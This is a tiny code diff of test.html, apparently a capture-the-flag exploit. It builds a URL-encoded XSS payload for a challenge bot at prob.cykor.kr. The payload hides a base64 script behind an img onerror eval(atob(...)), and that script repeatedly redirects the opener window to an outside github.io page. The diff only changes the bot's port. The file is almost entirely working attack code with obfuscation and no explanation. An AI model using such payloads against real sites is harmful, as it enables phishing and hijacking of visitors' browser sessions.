--- a/test.html
+++ b/test.html
@@ -1,5 +1,5 @@
 <script>
 var payload = encodeURIComponent(`http://%22%22http://%3Cscript%3Evar ha = "c2V0SW50ZXJ2YWwoKCkgPT4geyB3aW5kb3cub3BlbmVyICYmIHdpbmRvdy5vcGVuZXIubG9jYXRpb24uaHJlZi5pbmNsdWRlcygnaW5kZXguaHRtbCcpICYmICh3aW5kb3cub3BlbmVyLmxvY2F0aW9uLmhyZWYgPSAnaHR0cHM6Ly9kMXgwcmhrNS5naXRodWIuaW8vd2ViX3Rlc3QvdGVzdDEuaHRtbCcpOyB9LCAxKTs=";var newWin = window.open('http://prob.cykor.kr:8081/bot?url=http://""http://<img src=x onerror="eval(atob(\''%2b ha%2b '\'));">');%3C/script%3E`);
 
-window.location.href = "http://prob.cykor.kr/bot?url=" + payload;
+window.location.href = "http://prob.cykor.kr:8081/bot?url=" + payload;
 </script>
